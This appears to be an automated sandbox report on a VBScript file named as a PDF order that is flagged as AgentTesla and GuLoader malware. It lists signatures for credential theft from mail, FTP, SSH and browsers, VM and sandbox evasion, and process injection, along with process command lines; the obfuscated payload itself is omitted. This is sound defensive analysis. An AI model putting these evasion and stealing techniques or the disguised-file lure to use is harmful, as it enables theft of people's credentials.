Windows
Analysis Report
Ordine n.47201 pdf.vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Very long command line found
May check the online IP address of the machine
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses FTP
Found evasive API chain (may stop execution after accessing registry keys)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64
- wscript.exe (PID: 5812, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine n.47201 pdf.vbs", MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
- cmd.exe (PID: 5780, cmdline: CMD.EXE /c echo C:\Windows, MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 5860, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 5864, cmdline:
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = [obfuscated PowerShell script body omitted; the report lists it under "Very long command line found" and "Obfuscated command line found"]